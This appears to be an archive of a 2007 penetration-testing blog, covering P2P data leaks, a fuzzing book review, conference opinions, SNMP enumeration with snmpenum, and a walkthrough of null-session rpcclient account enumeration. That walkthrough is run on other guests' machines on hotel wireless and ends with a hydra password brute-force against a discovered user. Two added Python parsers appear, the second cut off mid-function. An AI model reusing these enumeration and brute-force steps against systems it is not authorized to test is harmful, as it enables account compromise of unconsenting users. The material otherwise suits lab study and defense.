Tuesday, July 31, 2007

Information Leaking via P2P


There are a couple of blog posts about classified/sensitive information leakage via P2P. The original article is here.

Blogs I read about it on: #1 & #2

Page 3 of the Network World article is the best, describing how some of these leakages occurred; thankfully it seems to be mostly family members downloading and installing P2P software on company computers, which is refreshing compared to the company idiot leaving the laptop in the car waiting for it to be stolen and contribute more to identity theft.

The fix for this, in my opinion, is not some fancy network appliance. Most networks that don't want to allow P2P traffic can block it; it's not that hard. What you can't block is what that "road warrior" employee does when they leave the work network and plug into the hotel wireless or the cable modem at home.

So what's the fix?

1. (Most importantly) User Education: when that person signs for a laptop to use, give them some education (pamphlet, talking-to, tattooed on their head, etc.) and make them sign a user agreement that specifically states what that person can and cannot do on that company laptop (seems like now you have to remind them not to let their spouse/kid play on that laptop too). Yearly education is another good option if the organization supports it, but it's got to be worth the user's time and actually be beneficial, i.e. not a check-the-block thing and not the same stuff every year.

2. Configuration Management: if you allow that laptop to connect back to your network it should be scanned, patched and the AV updated before it gets back on the network; hopefully at that time you can catch any unauthorized software that was installed.

While it wouldn't help the P2P problem, encrypting data at rest will help with those stolen laptops as well.

The Continuous Compliance mentioned in the nCircle blog (link #2) also seems like a good idea; I haven't looked at any solutions that do that though. Guess you have to balance the risk of a new remote application that you allow access into your network (mmmm yummy) against knowing sooner that someone installed unauthorized software on your company laptop.

3. Actually Punish Rule Breakers: those people that lost the laptops with the VA data should have been hung out to dry, especially the one that wasn't authorized to take data home to work on. If TJ Maxx can be held liable for millions for using WEP instead of WPA, the jackass that takes a laptop or data home when they aren't supposed to (especially with PII) should be fired if the data loss can be attributed to negligence on their part. The guy whose daughter installed LimeWire... canned; next time pay attention to what your kid/spouse is doing on the company laptop and don't let them do it. If you are too technically inept or just plain don't care about security then you shouldn't be able to check out laptops with corporate data.

I'm a big believer in that if you punish people when they do something wrong, others will be inclined NOT to do what that person did in the interest of self-preservation. It serves two purposes. First, if the punishment is severe enough it should curb repeat offenses, and second, it shows the public (if you answer to them) that you care and you did something to the offender to "right the wrong." I'd be a lot (well maybe not that much) less pissed if they fired the guy that lost the data with my PII than if they just got a slap on the wrist.

-CG

Support Information Security Day


As we get ready to head out to Vegas for Defcon I wanted to put in a plug for Information Security Day.

From the website:
Information Security Day was started to spread awareness of information security issues. Information Security, also known as Information Systems Security (INFOSEC), deals with the different aspects of information and its protection. Information Security Day aims at reducing the risk associated with information systems by increasing the awareness of the user community. The INFOSec Day aims at increasing awareness in the following areas:

>> Understanding the various information system components
>> Security Management Principles
>> Risk Assessment, Sensitivity and Criticality
>> Disaster Recovery and Emergency Procedures
>> Logical Security
>> Physical Security
>> Managerial Security Measures

http://www.informationsecurityday.com/
CG

Sunday, July 29, 2007

Enumerating user accounts on Linux and OS X with rpcclient


Yeah so I was bored on the hotel wireless... errr, lab... and started seeing who had ports 135, 139, 445 open. I found one guy running OS X 10.4 with Samba running and one guy running Ubuntu with Samba running, oh and also one guy running XP SP0/1 vulnerable to DCOM (won't even go down that road). Using rpcclient we can enumerate usernames on those OSes just like on a Windows OS. Obviously the SIDs are different but you can still pull down the usernames and start brute-forcing those other open services :-)

So let's run rpcclient with no options to see what's available:

SegFault:~ cg$ rpcclient
Usage: rpcclient [OPTION...]
-c, --command=COMMANDS Execute semicolon separated cmds
-I, --dest-ip=IP Specify destination IP address

Help options
-?, --help Show this help message
--usage Display brief usage message

Common samba options:
-d, --debuglevel=DEBUGLEVEL Set debug level
-s, --configfile=CONFIGFILE Use alternative configuration file
-l, --log-basename=LOGFILEBASE Basename for log/debug files
-V, --version Print version

Connection options:
-O, --socket-options=SOCKETOPTIONS socket options to use
-n, --netbiosname=NETBIOSNAME Primary netbios name
-W, --workgroup=WORKGROUP Set the workgroup name
-i, --scope=SCOPE Use this Netbios scope

Authentication options:
-U, --user=USERNAME Set the network username
-N, --no-pass Don't ask for a password
-k, --kerberos Use kerberos (active directory) authentication
-A, --authentication-file=FILE Get the credentials from a file
-S, --signing=on|off|required Set the client signing state
-P, --machine-pass Use stored machine account password

Once we are connected using a null session we get another set of options:

SegFault:~ cg$ rpcclient -U "" 192.168.182.36
Password:
timeout connecting to 192.168.182.36:445
rpcclient $> help
--------------- ----------------------
SHUTDOWN
shutdowninit Remote Shutdown (over shutdown pipe)
shutdownabort Abort Shutdown (over shutdown pipe)
--------------- ----------------------
ECHO
echoaddone Add one to a number
echodata Echo data
sinkdata Sink data
sourcedata Source data
--------------- ----------------------
REG
shutdown Remote Shutdown
abortshutdown Abort Shutdown
--------------- ----------------------
DFS
dfsexist Query DFS support
dfsadd Add a DFS share
dfsremove Remove a DFS share
dfsgetinfo Query DFS share info
dfsenum Enumerate dfs shares
--------------- ----------------------
SRVSVC
srvinfo Server query info
netshareenum Enumerate shares
netfileenum Enumerate open files
netremotetod Fetch remote time of day
--------------- ----------------------
NETLOGON
logonctrl2 Logon Control 2
getdcname Get trusted DC name
logonctrl Logon Control
samsync Sam Synchronisation
samdeltas Query Sam Deltas
samlogon Sam Logon
change_trust_pw Change Trust Account Password
--------------- ----------------------
SPOOLSS
adddriver Add a print driver
addprinter Add a printer
deldriver Delete a printer driver
deldriverex Delete a printer driver with files
enumdata Enumerate printer data
enumdataex Enumerate printer data for a key
enumkey Enumerate printer keys
enumjobs Enumerate print jobs
enumports Enumerate printer ports
enumdrivers Enumerate installed printer drivers
enumprinters Enumerate printers
getdata Get print driver data
getdataex Get printer driver data with keyname
getdriver Get print driver information
getdriverdir Get print driver upload directory
getprinter Get printer info
openprinter Open printer handle
setdriver Set printer driver
getprintprocdir Get print processor directory
addform Add form
setform Set form
getform Get form
deleteform Delete form
enumforms Enumerate forms
setprinter Set printer comment
setprintername Set printername
setprinterdata Set REG_SZ printer data
rffpcnex Rffpcnex test
--------------- ----------------------
SAMR
queryuser Query user info
querygroup Query group info
queryusergroups Query user groups
queryuseraliases Query user aliases
querygroupmem Query group membership
queryaliasmem Query alias membership
querydispinfo Query display info
querydominfo Query domain info
enumdomusers Enumerate domain users
enumdomgroups Enumerate domain groups
enumalsgroups Enumerate alias groups
createdomuser Create domain user
samlookupnames Look up names
samlookuprids Look up names
deletedomuser Delete domain user
samquerysecobj Query SAMR security object
getdompwinfo Retrieve domain password info
lookupdomain Lookup Domain Name
--------------- ----------------------
LSARPC-DS
dsroledominfo Get Primary Domain Information
dsenumdomtrusts Enumerate all trusted domains in an AD forest
--------------- ----------------------
LSARPC
lsaquery Query info policy
lookupsids Convert SIDs to names
lookupnames Convert names to SIDs
enumtrust Enumerate trusted domains
enumprivs Enumerate privileges
getdispname Get the privilege name
lsaenumsid Enumerate the LSA SIDS
lsaenumprivsaccount Enumerate the privileges of an SID
lsaenumacctrights Enumerate the rights of an SID
lsaaddacctrights Add rights to an account
lsaremoveacctrights Remove rights from an account
lsalookupprivvalue Get a privilege value given its name
lsaquerysecobj Query LSA security object
--------------- ----------------------
GENERAL OPTIONS
help Get help on commands
? Get help on commands
debuglevel Set debug level
list List available commands on
exit Exit program
quit Exit program
sign Force RPC pipe connections to be signed
seal Force RPC pipe connections to be sealed
schannel Force RPC pipe connections to be sealed with 'schannel' (NETSEC). Assumes valid machine account to this domain controller.
schannelsign Force RPC pipe connections to be signed (not sealed) with 'schannel' (NETSEC). Assumes valid machine account to this domain controller.
none Force RPC pipe connections to have no special properties


Let's play with a few options:

rpcclient $> enumprivs
found 5 privileges

SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SaAddUsers 0:65281 (0x0:0xff01)
SaPrintOp 0:65283 (0x0:0xff03)


Enumerating shares:

rpcclient $> netshareenum
netname: IPC$
remark: IPC Service (Mac OS X)
path: C:\tmp
password:
netname: ADMIN$
remark: IPC Service (Mac OS X)
path: C:\tmp
password:
netname: PSC 2170 Series
remark: PSC 2170 Series
path: C:\tmp
password:


Samba/OS info:

rpcclient $> srvinfo
LEWISFAMILY Wk Sv PrQ Unx NT SNT Mac OS X
platform_id : 500
os version : 4.9
server type : 0x9a03


Using "lookupnames" on an account we know exists (root) we get its SID. Once we have "a" SID we have the domain part, everything before the last dash; the last number is the RID, so we can enumerate the rest by feeding neighbouring RIDs to "lookupsids". NT_STATUS_NONE_MAPPED just means nothing is assigned to that RID.

rpcclient $> lookupnames root
root S-1-5-21-1835020781-2383529660-3657267081-1000 (User: 1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-500
S-1-5-21-1835020781-2383529660-3657267081-500 LEWISFAMILY\Administrator (1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-501
S-1-5-21-1835020781-2383529660-3657267081-501 LEWISFAMILY\unknown (1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-502
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1001
S-1-5-21-1835020781-2383529660-3657267081-1001 LEWISFAMILY\wheel (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1000
S-1-5-21-1835020781-2383529660-3657267081-1000 LEWISFAMILY\root (1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1002
S-1-5-21-1835020781-2383529660-3657267081-1002 LEWISFAMILY\daemon (1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1003
S-1-5-21-1835020781-2383529660-3657267081-1003 LEWISFAMILY\daemon (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1004
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupnames guest
guest S-1-5-21-1835020781-2383529660-3657267081-1063 (Local Group: 4)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1005
S-1-5-21-1835020781-2383529660-3657267081-1005 LEWISFAMILY\kmem (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1004
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1006
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1007
S-1-5-21-1835020781-2383529660-3657267081-1007 LEWISFAMILY\sys (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1008
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1009
S-1-5-21-1835020781-2383529660-3657267081-1009 LEWISFAMILY\tty (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1010
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1011
S-1-5-21-1835020781-2383529660-3657267081-1011 LEWISFAMILY\operator (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1012
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1013
S-1-5-21-1835020781-2383529660-3657267081-1013 LEWISFAMILY\mail (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1014
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1015
S-1-5-21-1835020781-2383529660-3657267081-1015 LEWISFAMILY\bin (2)
rpcclient $> lookupnames lewis
lewis S-1-5-21-1835020781-2383529660-3657267081-2002 (User: 1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2000
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2001
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2002
S-1-5-21-1835020781-2383529660-3657267081-2002 LEWISFAMILY\user (1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2003
S-1-5-21-1835020781-2383529660-3657267081-2003 LEWISFAMILY\user (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2004
result was NT_STATUS_NONE_MAPPED


You get the idea; it was pretty much the same for the Ubuntu guy except that his user account SIDs ended in -3000.
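As an added example (not from the original post), here is a parser for the lookupnames/lookupsids transcript above: it splits each SID into domain SID and RID, records which RIDs resolve and to what, and summarizes what the null session exposed. The RID-to-uid/gid inversion assumes Samba 3's default algorithmic mapping (algorithmic rid base = 1000: users at uid*2+1000, groups at gid*2+1001), which is what the 1000/1001/2002/2003 pattern above reflects.

```python
"""Parse an rpcclient lookupnames/lookupsids transcript into a structured view of
what a null session gives away.  Added example, not code from the original post."""
import re
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# SID_NAME_USE codes: the number rpcclient prints in parentheses after each result.
SID_NAME_USE = {1: "User", 2: "Domain Group", 3: "Domain", 4: "Local Group (alias)",
                5: "Well-known Group", 6: "Deleted Account", 8: "Unknown", 9: "Computer"}

PROMPT_RE = re.compile(r"^rpcclient \$> (\w+)\s*(.*)$")
# Matches both "root S-1-...-1000 (User: 1)" and "S-1-...-500 DOMAIN\name (1)" result lines.
RESULT_RE = re.compile(r"^(?P<lhs>\S+)\s+(?P<rhs>\S+)\s+\((?:[A-Za-z ]+:\s*)?(?P<kind>\d+)\)$")

# Constructed sample transcript using the SIDs and names from the session above.
SAMPLE_TRANSCRIPT = r"""
rpcclient $> lookupnames root
root S-1-5-21-1835020781-2383529660-3657267081-1000 (User: 1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-500
S-1-5-21-1835020781-2383529660-3657267081-500 LEWISFAMILY\Administrator (1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-502
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1001
S-1-5-21-1835020781-2383529660-3657267081-1001 LEWISFAMILY\wheel (2)
rpcclient $> lookupnames guest
guest S-1-5-21-1835020781-2383529660-3657267081-1063 (Local Group: 4)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2002
S-1-5-21-1835020781-2383529660-3657267081-2002 LEWISFAMILY\user (1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2003
S-1-5-21-1835020781-2383529660-3657267081-2003 LEWISFAMILY\user (2)
"""


@dataclass
class Account:
    rid: int
    name: str
    kind: int  # SID_NAME_USE code

    @property
    def kind_name(self) -> str:
        return SID_NAME_USE.get(self.kind, f"type {self.kind}")


def split_sid(sid: str) -> Tuple[str, int]:
    """'S-1-5-21-a-b-c-1000' -> ('S-1-5-21-a-b-c', 1000): the RID is the last sub-authority."""
    prefix, _, rid = sid.rpartition("-")
    return prefix, int(rid)


def parse_transcript(text: str) -> Tuple[Optional[str], Dict[int, Optional[Account]]]:
    """Return (domain SID, {rid: Account or None}); None marks a RID that came back as
    NT_STATUS_NONE_MAPPED, i.e. nothing is assigned to it."""
    domain_sid: Optional[str] = None
    accounts: Dict[int, Optional[Account]] = {}
    pending_sid: Optional[str] = None  # argument of the most recent lookupsids command
    for raw in text.splitlines():
        line = raw.strip()
        m = PROMPT_RE.match(line)
        if m:
            pending_sid = m.group(2) if m.group(1) == "lookupsids" else None
            continue
        if "NT_STATUS_NONE_MAPPED" in line and pending_sid:
            prefix, rid = split_sid(pending_sid)
            domain_sid, accounts[rid] = domain_sid or prefix, None
            continue
        m = RESULT_RE.match(line)
        if not m:
            continue
        lhs, rhs, kind = m.group("lhs"), m.group("rhs"), int(m.group("kind"))
        sid, name = (lhs, rhs) if lhs.startswith("S-1-") else (rhs, lhs)
        prefix, rid = split_sid(sid)
        domain_sid = domain_sid or prefix
        accounts[rid] = Account(rid, name.rpartition("\\")[2], kind)  # drop DOMAIN\ prefix
    return domain_sid, accounts


def unix_id_from_rid(rid: int, base: int = 1000) -> Optional[Tuple[str, int]]:
    """Invert Samba 3's algorithmic RID mapping (assumed default 'algorithmic rid base' = 1000):
    users sit at uid*2 + base, groups at gid*2 + base + 1.  RIDs below base are well-known
    (500 Administrator, 501 Guest) and carry no Unix id."""
    if rid < base:
        return None
    offset = rid - base
    return ("uid" if offset % 2 == 0 else "gid", offset // 2)


def exposure_summary(accounts: Dict[int, Optional[Account]]) -> Dict[str, list]:
    """What the anonymous caller learned: user names, group names and free RIDs."""
    users = sorted(a.name for a in accounts.values() if a and a.kind == 1)
    groups = sorted(a.name for a in accounts.values() if a and a.kind in (2, 4))
    unmapped = sorted(rid for rid, a in accounts.items() if a is None)
    return {"users": users, "groups": groups, "unmapped_rids": unmapped}


if __name__ == "__main__":
    domain, accts = parse_transcript(SAMPLE_TRANSCRIPT)
    print("domain SID:", domain)
    for rid, acct in sorted(accts.items()):
        label = "unassigned" if acct is None else f"{acct.name} ({acct.kind_name})"
        print(f"{rid:>5}  {label:<30} {unix_id_from_rid(rid) or ''}")
    print(exposure_summary(accts))
```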

Now that I have some user accounts...

ATTACK!!!

SegFault:~/Documents/Evil cg$ hydra -l lewis -P common-passwords.txt 192.168.182.36 smb -V
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
Hydra v5.1 (c) 2005 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2007-07-27 21:51:46
[DATA] 1 tasks, 1 servers, 816 login tries (l:1/p:816), ~816 tries per task
[DATA] attacking service smb on port 139
[STATUS] 29.00 tries/min, 29 tries in 00:01h, 787 todo in 00:28h
...


Yet another reason to adjust your file & printer sharing configuration when you take your computer on the road (especially if you share your My Documents folder).

-CG

Book Review: Fuzzing: Brute Force Vulnerability Discovery




Fuzzing: Brute Force Vulnerability Discovery

By Michael Sutton, Adam Greene, Pedram Amini

“Great on Theory…Pretty Good on Execution”

Four Stars

I anxiously awaited reading and putting this book to use. Fuzzing is one of those “mystical” concepts that the people cranking out exploits were doing and I wanted to be able to use some of the publicly available fuzzers to fuzz for vulnerabilities and join the ranks.

From the back cover: “…Now, it's your turn. In this book, renowned fuzzing experts show you how to use fuzzing to reveal weaknesses in your software before someone else does.”

I thought the book excellently covered the theory portions of fuzzing. The format of theory/background of a fuzzing method (Environment Variable and Argument Fuzzing, Web Application and Server Fuzzing, File Format Fuzzing, Network Protocol Fuzzing, Web Browser Fuzzing, and In-Memory Fuzzing) followed by that fuzzing method's Automation section, or its Unix and then Windows sections, worked perfectly. It was a good structure and informative. The Automation or Unix and Windows sections fit in well with the theory sections before them.

I think the book falls a bit short on practical execution (case studies) of using the fuzzing tools. Granted, I say this based on my own expectations of what I would like to see from a fuzzing book, but also from what the authors say in the preface that we will get out of the book. They say, “We detail numerous vulnerabilities throughout the book and discuss how they might have been identified through fuzzing.” Some of the case studies are exactly what I expected, like the case studies in Chapter 10, the fuzzing with SPIKE section in Chapter 15, and the Complete Walkthru with Sulley in Chapter 21. Some of the others fall a bit short. I expected a lot more out of the ActiveX fuzzing sections (Chapter 18); the Shockwave Flash example in Chapter 21 was useful for the discussion of creating a test case for a protocol, but after 11 pages of mostly code in the last section we basically get told to load it into PaiMei and “go fuzz”; and while the theory parts of Chapters 7 & 8 were great, telling me to find an AIX 5.3 box to see some example environment variable and argument vulnerabilities was less than useful. It would have been much more useful to use some of today's fuzzing tools to find some old vulnerabilities in something like *BSD or old Red Hat distributions, something I might have in the lab or at least something I could install in VMware.

Likes: Theory, background, discussion of how and why they built the “author built” fuzzers they cover in the book, some of the case studies gave me everything I needed to reproduce on my own in the lab. Providing the fuzzers on the companion website was great as well. The George Bush quotes were hilarious as well and made me look forward to each chapter so I could get another quote.

Dislikes: some of the case studies I don't think went into enough detail (no step-by-step instructions); I think the explanations of the blocks of code could have been better, and numbering lines so we could refer to them in the text would have helped. The discussion of the existing frameworks was a little bit light (but we do get told to go to the companion website for more info). Ideally we would have walked through a couple of easy examples using multiple fuzzer frameworks to get us from advisory to EIP=0x41414141. That would have been nice to see.

Overall a great book; it has a place on the bookshelf next to The Shellcoder's Handbook and some other programming books, and it will be used (many times) as a reference to play with the various fuzzers available out there.

CG

Monday, July 23, 2007

Thoughts on Security Conferences versus Practical Knowledge


Over on SecurityFocus.com Don Parker posted an article on Security conferences versus practical knowledge.

Overall I see his point that the talks given at the average security conference actually give little to the average participant to bring home and put into effect on his/her network. He asserts that the training given at conferences (usually 2+ days before the talks) is top notch but the speakers fall short. He also says that a security conference focusing on "practical knowledge" would be far better.

From the article:
"Today's computer security conferences no longer offer relevant or practical knowledge to the attendee. Be honest now, when was the last computer security conference that you went to where you came away from with several ideas to implement immediately onto your networks? I would wager none. "
...
"What my not making the cut sank home for me though was that there are precious little practical talks going on today at computer security conferences."

Some thoughts on those quotes:
We have done this to ourselves by demanding that we hear talks on the latest research and 0-day, brand new exploit attack vector, uber l33t hack tool, etc. when we go to these security conferences. At some point we moved away from talks on practical widespread attack vectors on our networks to teeny tiny attack vectors, because all the "practical talks" have been given already, and why do people want to pay tons of money to hear someone talk about research or information that everyone already knows?

When was the last time I got something useful from a security conference? The last con I went to was ShmooCon 07 (my posts on EH.net about it: 1, 2, & 3) and while I wasn't able to go back to work, sit down at the domain admin MMC or router console and make changes that secured my network, I still got a lot out of the con. You can read my day by day if you want, but I'll assert that being able to go back and make a change or implement something new on your network after attending a security con is a poor metric to judge a conference's selection of speakers or the value of the conference. Talks I did get a lot out of were:

Avi Rubin's keynote talk on vulnerability disclosure. Do I do this every day? No. But great information to know for when I have enough fu to worry about doing disclosures.

Matt Fisher, Cygnus, and PresMike's talk on Web Application Incident Preparation. Again, I don't run a web server, but if I did I would have gone back and looked at what we had in place to deal with incidents that could occur through my web app.

I missed Richard Bejtlich's talk but I'll wager it was worth listening to :-)

Chris Paget's talk on WPAD, if we were using it, would have been a talk after which I would have had to sit down at the keyboard and do some fixing.

There was more, I won't list them all; hell, even the guys talking about guns were worthwhile, but not something I could have used at work.

Link to the speakers

So what's my point???!!! First, another quote...

"It is not everybody who can attend today's cutting edge security conferences and actually walk away having learned something. What is it that you are going to get out of it, and just how will it benefit our network? If the answers aren't there, you're not going. Practical knowledge is where it is at."

My point is that I think people (anyone if they have some brain cells and interest) do get things out of conferences even if they can't directly put it into action at work. New ways of thinking about attacking problems, hearing about things that will most likely become issues later, in my opinion is invaluable, much for the same reason that subscribing to security mailing lists has value despite the noise: already knowing about that exploit you see on CNN or some other online computer site a few days after the code was dropped has value. Frankly, being around some of the researchers that have that much "fu" is also valuable because it can show you that what's out in public knowledge about a system is probably not even remotely all that is known or doable with the system, not to mention just the inspiration of being around some of these people with that much security brainpower. You wanna get motivated? Go listen to Dan Kaminsky talk about bending DNS packets to his will or HD Moore 0wning some un-ownable app, or if packet fu is your thing go listen to Richard Bejtlich, or if you are into reversing go listen to Halvar Flake. If that doesn't inspire you to do some work in the home lab or crack a book to be a better security guy/gal, well I don't know what to tell you except to maybe look at why you are in the field.

More random thoughts on the above quote:
At least it can maybe now justify the cost of training you can take at the conference, since you usually get access to the talks for free if you took the training. On the other hand, how often has it been that the "obscure non-practical theory/idea" talk actually turned into a huge attack vector? I'm sure the people that first listened to a talk on the supposed vulnerabilities in WEP didn't really come home with the "practical knowledge" to do anything about it on their networks, but we saw later how widespread and dangerous an attack vector it was. Unfortunately people don't give a crap about a new vector (it isn't practical yet) unless the guy is dropping a kiddie-friendly tool anyway; then maybe they'll go home and fix or upgrade the network to defend against the attack.

If we do go the "practical knowledge" con route:
Another thing to think about is how do I justify to my boss sending me to a conference where they are going to talk about "practical knowledge" that I can 1) probably get in town from a local training center or 2) from a book for significantly less cost?

Don't get me wrong, I'm all for a conference where I get something practical out of every talk, but I would think it's hard to organize a con like that because what might be new information for me might be old news to you. Of course that's probably why there are different tracks and more than one talk going on at a time. Valid points though, something for those con organizers to think about at speaker selection time.

Wrap up:
So all that yakking, what's the point? The point, if you just scrolled down to the bottom, is that being able to go back and make a change or implement something new on your network after attending a security con is a poor metric to judge a conference's selection of speakers, the value of the conference, or the value of attending. The value of a security conference is more than the talks and beer drinking (both important parts though) that can be done at the conference. The inspiration to do/learn more, exposure to new concepts/methods, and networking with like-minded individuals can pay dividends later as well.
CG

Sunday, July 22, 2007

Why GoogleAds rule...


CG

Hey that's my vid they're talking about!


Over on darknet.org.uk they had a post on Metasploit and said of the video I posted over on EthicalHacker.net: "The most up to date video for Metasploit 3 can be found here:"

The post

Of course if anyone there was an LSO Member they would have seen those videos a long time ago :-)

The videos in question... Part 1 & Part 2

-CG

Saturday, July 21, 2007

SNMP enumeration with snmpenum and snmpwalk


Over in LSO-Chat we were talking about SNMP enumeration: why you would want to do that, and what kind of information you could pull from an SNMP service even with only READ permissions available.

So let's run snmpenum.pl (one of many SNMP enumeration utilities) against a Windows 2000 server with the SNMP service installed (not installed by default):

[root@localhost snmpenum]# perl snmpenum.pl
Usage: perl enum.pl

[root@localhost snmpenum]# perl snmpenum.pl 192.168.38.200 public windows.txt

----------------------------------------
INSTALLED SOFTWARE
----------------------------------------

freeSSHd 1.0.9
freeFTPd 1.0.8
CesarFTP 0.99g
Microsoft SQL Server 2000
PeerCast (remove only)
TFTP Server TFTPDWIN version 0.4.2
Bitvise WinSSHD 4.19 (remove only)
VMware Tools
WebFldrs
UltraVNC v1.0.2

----------------------------------------
UPTIME
----------------------------------------

2 hours, 19:02.87

----------------------------------------
HOSTNAME
----------------------------------------

LSO-DEV

----------------------------------------
USERS
----------------------------------------

Guest
Asmith
Bsmith
Dsmith
Esmith
Fsmith
Gsmith
Hsmith
Jsmith
Ksmith
Lsmith
Msmith
Nsmith
Osmith
Psmith
Qsmith
Rsmith
Ssmith
Tsmith
Usmith
Vsmith
Wsmith
Xsmith
Ysmith
Zsmith
csmith
meanie
linneag
Administrator
TsInternetUser
IUSR_VICTIM-W2K
IWAM_VICTIM-W2K

----------------------------------------
DISKS
----------------------------------------

A:\
C:\ Label: Serial Number 20e619b8
D:\ Label:WIN2000_EN Serial Number f1a3fc3
Virtual Memory

----------------------------------------
RUNNING PROCESSES
----------------------------------------

System Idle Process
System
smss.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
sqlmangr.exe
svchost.exe
SPOOLSV.EXE
VMwareTray.exe
llssrv.exe
FreeSSHDService
explorer.exe
FreeFTPDService
svchost.exe
sqlservr.exe
regsvc.exe
mstask.exe
svchost.exe
snmp.exe
VMwareService.e
winmgmt.exe
WinSSHD.exe
winvnc.exe
dfssvc.exe
inetinfo.exe
mssearch.exe
IEXPLORE.EXE
badblue.exe
sshdctrl.exe
tftpd.exe
VMwareUser.exe

----------------------------------------
LISTENING UDP PORTS
----------------------------------------

135
161
445
1029
1034
1434
3456

----------------------------------------
SYSTEM INFO
----------------------------------------

Hardware: x86 Family 15 Model 2 Stepping 8 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free)

----------------------------------------
SHARES
----------------------------------------

----------------------------------------
LISTENING TCP PORTS
----------------------------------------

21
22
25
80
135
443
445
1030
1032
1035
2121
5800
5900
6941
8080
55555

----------------------------------------
SERVICES
----------------------------------------

Server
Alerter
WinSSHD
Event Log
Messenger
Net Logon
Telephony
DNS Client
VNC Server
DHCP Client
MSSQLSERVER
Workstation
SNMP Service
Windows Time
Plug and Play
Print Spooler
RunAs Service
Task Scheduler
FreeSSHDService
freeFTPdService
Computer Browser
Microsoft Search
COM+ Event System
IIS Admin Service
Protected Storage
Removable Storage
IPSEC Policy Agent
Network Connections
Logical Disk Manager
VMware Tools Service
FTP Publishing Service
Distributed File System
License Logging Service
Remote Registry Service
Security Accounts Manager
System Event Notification
Remote Procedure Call (RPC)
TCP/IP NetBIOS Helper Service
NT LM Security Support Provider
Distributed Link Tracking Client
World Wide Web Publishing Service
Windows Management Instrumentation
Simple Mail Transport Protocol (SMTP)
Windows Management Instrumentation Driver Extensions

----------------------------------------
DOMAIN
----------------------------------------

LSOCORP

[root@localhost snmpenum]#

Not a bad little bit of info. Now, realistically, would you see this from outside the firewall? I hope not. But on an internal assessment you may be able to use SNMP to pull off a list of usernames to try some password attacks, verify patch level, check out what ports are listening, and see running services. All kinds of fun stuff.
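As an added example (not snmpenum's own code), here is a parser for the sectioned report above, plus a baseline diff a defender can run over the same output to spot drift: listening ports, installed software and local accounts that are not supposed to be there. The sample excerpt and the baseline values are constructed for the example.

```python
"""Parse snmpenum's sectioned report and diff it against a host baseline.
Added example, not snmpenum's own code."""
import re
from typing import Dict, List

RULE = "-" * 40  # snmpenum prints this above and below every section title
PROMPT_RE = re.compile(r"^\[[^\]]*\]#")  # shell prompt echoed after the last section

# Constructed excerpt in the layout shown above (values abbreviated from that run).
SAMPLE_OUTPUT = """\
----------------------------------------
INSTALLED SOFTWARE
----------------------------------------

freeSSHd 1.0.9
CesarFTP 0.99g
UltraVNC v1.0.2

----------------------------------------
HOSTNAME
----------------------------------------

LSO-DEV

----------------------------------------
USERS
----------------------------------------

Guest
Administrator
IUSR_VICTIM-W2K

----------------------------------------
SHARES
----------------------------------------

----------------------------------------
LISTENING TCP PORTS
----------------------------------------

21
22
5900
8080

[root@localhost snmpenum]#
"""

# What this host is supposed to look like (constructed baseline for the example).
BASELINE = {"tcp_ports": {21, 22, 80, 443},
            "software": {"freeSSHd 1.0.9", "VMware Tools"},
            "users": {"Administrator", "Guest"}}


def parse_snmpenum(text: str) -> Dict[str, List[str]]:
    """{SECTION TITLE: [entries]}: a title is the line framed by two rules, and every
    non-blank line up to the next rule is an entry (an empty section like SHARES gives [])."""
    lines = [ln.strip() for ln in text.splitlines()]
    sections: Dict[str, List[str]] = {}
    i = 0
    while i < len(lines):
        if lines[i] == RULE and i + 2 < len(lines) and lines[i + 2] == RULE:
            title, body, i = lines[i + 1], [], i + 3
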